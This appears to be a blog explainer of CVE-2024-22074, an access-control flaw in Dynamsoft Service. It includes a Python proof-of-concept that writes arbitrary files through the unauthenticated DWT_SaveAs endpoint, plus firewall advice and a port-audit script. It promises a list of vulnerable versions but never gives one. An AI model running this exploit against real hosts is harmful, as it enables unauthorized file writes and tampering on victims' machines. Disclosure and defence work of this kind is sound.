In early 2024, a critical security vulnerability was discovered in Dynamsoft Service, a tool often used for document scanning in web applications. This vulnerability, tracked as CVE-2024-22074, centers around incorrect access control. Attackers can exploit this flaw to perform unauthorized actions on affected systems.
Let's break it down in simple language, look at which versions are vulnerable, how the exploit works (including sample code), and most importantly, how to protect yourself. We’ll also link to the original sources for those who want the official details.
What is Dynamsoft Service?
Dynamsoft Service is middleware for enabling document scanning (from scanners, webcams, etc.) directly in browsers. It’s popular in businesses, healthcare, and government services for digitizing paperwork.
The Vulnerability: What’s the Problem?
Incorrect Access Control means the software doesn’t properly check if a request is coming from an authorized user. In the case of Dynamsoft Service, it listens on a local port (usually 18622 or 18623) for incoming HTTP requests. Normally, only trusted client apps should connect — but due to this flaw, any local or even remote user can send commands, including scanning, saving, downloading, or even deleting files.
This can lead to sensitive information exposure or system compromise, depending on how the service is used.
Exploiting CVE-2024-22074
Let’s get practical. Here’s how an attacker might exploit this flaw.
1. Find a PC running a vulnerable version of Dynamsoft Service.
2. The attacker sends crafted HTTP requests to the service’s port, exploiting the lack of proper authorization checks.
3. The attacker can instruct the service to scan documents, save files, or download content from the victim’s machine.
PoC (Proof of Concept) Exploit: Save Arbitrary File
Below is a simple PoC Python script that writes a file to the victim’s machine using the vulnerable Dynamsoft endpoint.
```python
import requests

# Change this to the victim's IP if accessible remotely; for local, use 127.0.0.1
TARGET = "127.0.0.1"
PORT = 18622

# Arbitrary content to write
content = "This is a test file dropped by CVE-2024-22074 exploit."
filename = "C:\\test_cve_22074.txt"

url = f"http://{TARGET}:{PORT}/DynamicWebTWAIN/DWT_SaveAs"

# Payload as expected by the vulnerable endpoint (parameters may change by version)
data = {
    "filename": filename,
    "filedata": content
}

# Send POST request
response = requests.post(url, data=data)

if response.status_code == 200:
    print(f"[+] Successfully wrote file to {filename} on {TARGET}")
else:
    print(f"[-] Failed. HTTP Status: {response.status_code}")
```
What does this code do?
- It tells the Dynamsoft Service to write a file named C:\test_cve_22074.txt with the specified content.
- Because the vulnerable service does not block unauthorized attempts, the file is created without proper checks.
Real-World Impact
This vulnerability is particularly dangerous in shared environments or if the service port is accessible remotely (via misconfiguration or local malware). Users with physical or remote desktop access, or malware running at a low privilege, can abuse this to steal or alter data.
Restrict Access
Use local firewalls or Windows Defender Firewall rules to only allow trusted applications to connect to Dynamsoft Service ports (usually 18622/18623).
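A check to pair with the firewall rule, added here as an example (not code from the original post or from Dynamsoft): it parses Windows `netstat -ano` output and reports whether anything listening on ports 18622/18623 is bound beyond loopback. The sample output and the function name `audit_listeners` are constructed for illustration.

```python
import ipaddress
import sys

DYNAMSOFT_PORTS = {18622, 18623}  # ports named in the article

# Constructed sample of Windows `netstat -ano` output (not captured from a real host).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:18622          0.0.0.0:0              LISTENING       4312
  TCP    127.0.0.1:18623        0.0.0.0:0              LISTENING       4312
  TCP    [::1]:18623            [::]:0                 LISTENING       4312
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.1.20:49800     192.168.1.5:18622      ESTABLISHED     5120
"""


def audit_listeners(netstat_output, ports=DYNAMSOFT_PORTS):
    """Return (address, port, pid, scope) for each TCP listener on the given ports."""
    findings = []
    for line in netstat_output.splitlines():
        fields = line.split()
        # Only TCP sockets in LISTENING state are of interest.
        if len(fields) != 5 or fields[0] != "TCP" or fields[3] != "LISTENING":
            continue
        host, _, port = fields[1].rpartition(":")
        if not port.isdigit() or int(port) not in ports:
            continue
        # Strip IPv6 brackets and any zone id (fe80::1%12) before parsing.
        host = host.strip("[]").split("%")[0]
        try:
            loopback = ipaddress.ip_address(host).is_loopback
        except ValueError:
            continue  # not an address we can classify
        # Loopback-only still leaves local processes able to reach the service.
        scope = "loopback-only" if loopback else "network-reachable"
        findings.append((host, int(port), int(fields[4]), scope))
    return findings


if __name__ == "__main__":
    # Pipe real output in (netstat -ano | python this_script.py) or run bare for the sample.
    text = SAMPLE_NETSTAT if sys.stdin.isatty() else sys.stdin.read()
    for host, port, pid, scope in audit_listeners(text):
        print(f"{scope:18} {host}:{port} (PID {pid})")
```

Any `network-reachable` row means the port is bound on an interface other hosts can reach, so the firewall restriction above is the only thing standing between the service and the network.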
Official References
- NIST NVD - CVE-2024-22074 Entry
- Dynamsoft Service Changelog & Security Advisories
Conclusion
CVE-2024-22074 is a severe and easily exploitable vulnerability if you’re running the affected versions of Dynamsoft Service. If your organization uses this tool, update immediately and secure the ports.
Timeline
Published on: 06/06/2024 21:15:48 UTC
Last modified on: 10/16/2024 15:39:58 UTC